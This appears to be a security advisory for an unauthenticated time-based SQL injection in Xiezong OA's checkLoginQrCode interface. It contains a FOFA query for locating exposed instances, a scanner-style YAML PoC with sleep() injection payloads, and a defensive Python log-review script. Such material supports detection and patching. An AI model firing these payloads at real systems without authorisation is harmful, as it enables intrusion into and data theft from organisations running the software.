cnoa-checkLoginQrCode-sqli: 协众 OA checkLoginQrCode SQL Injection

Date: 2025-09-01 | Affected software: 协众OA | PoC: public

Vulnerability description

The Xiezong OA (协众OA) system has a SQL injection vulnerability in the checkLoginQrCode interface. Unauthenticated attackers can exploit this vulnerability to extract information from the database.

FOFA: app="协众软件-协众OA"

PoC code [public]

id: cnoa-checkLoginQrCode-sqli
info:
  name: 协众 OA checkLoginQrCode SQL Injection
  author: ZacharyZcR
  severity: high
  verified: true
  description: |
    Xiezong OA system has a SQL injection vulnerability in the checkLoginQrCode interface.
    Unauthenticated attackers can exploit this vulnerability to extract information from the database.
    FOFA: app="协众软件-协众OA"
  reference:
    - https://github.com/wy876/POC/blob/main/%E5%8D%8F%E4%BC%97OA/%E5%8D%8F%E4%BC%97OA%E7%B3%BB%E7%BB%9F%E6%8E%A5%E5%8F%A3checkLoginQrCode%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0.md
  tags: cnoa,sqli
  created: 2024/12/31

rules:
  r0:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(10))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r1:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(6))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 8000 &&  
      response.latency >= 6000
  r2:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(10))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 12000 &&  
      response.latency >= 10000
  r3:
    request:
      method: POST
      path: /index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode
      body: id=(select * from (select sleep(6))z)
    expression: |
      response.status == 200 && 
      response.body.bcontains(b'"failure":true') &&
      response.latency <= 8000 &&  
      response.latency >= 6000
expression: r0() && r1() && r2() && r3()
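
A defender-side check for the request pattern the rules above probe, as an added example that is not part of the original PoC: it reviews logged requests to the checkLoginQrCode action and flags an `id` value that is not a plain token, or a multi-second response. The record layout, the token pattern and the 5000 ms threshold are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate QR-login id is a short opaque token.
SAFE_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")
SLOW_MS = 5000  # assumed threshold; a status poll should answer quickly

ENDPOINT = "/index.php?app=main&func=common&action=commonJob&act=checkLoginQrCode"

# Constructed sample records (method, path, form body, latency in ms).
SAMPLE = [
    {"method": "POST", "path": ENDPOINT, "body": "id=8f3c2a71b9", "latency_ms": 40},
    {"method": "POST", "path": ENDPOINT,
     "body": "id=(select * from (select sleep(10))z)", "latency_ms": 10050},
    {"method": "POST", "path": "/index.php?app=main&func=common&act=other",
     "body": "id=42", "latency_ms": 9000},
]

def is_target(path):
    """True when the request addresses the checkLoginQrCode action."""
    query = parse_qs(urlsplit(path).query)
    return query.get("act") == ["checkLoginQrCode"]

def review(record):
    """Return the reasons a logged request to the endpoint looks suspicious."""
    if record["method"] != "POST" or not is_target(record["path"]):
        return []
    reasons = []
    ids = parse_qs(record["body"], keep_blank_values=True).get("id", [])
    # Exactly one id, made only of token characters, is expected.
    if len(ids) != 1 or not SAFE_ID.fullmatch(ids[0]):
        reasons.append("id is not a plain token")
    if record["latency_ms"] >= SLOW_MS:
        reasons.append("slow response")
    return reasons

def flagged(records):
    """Map record index to its reasons, for records with at least one reason."""
    hits = {}
    for i, rec in enumerate(records):
        reasons = review(rec)
        if reasons:
            hits[i] = reasons
    return hits

if __name__ == "__main__":
    for idx, why in flagged(SAMPLE).items():
        print(idx, ", ".join(why))
```

The same token pattern can serve as server-side input validation in front of the handler, alongside parameterized queries in the application itself.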
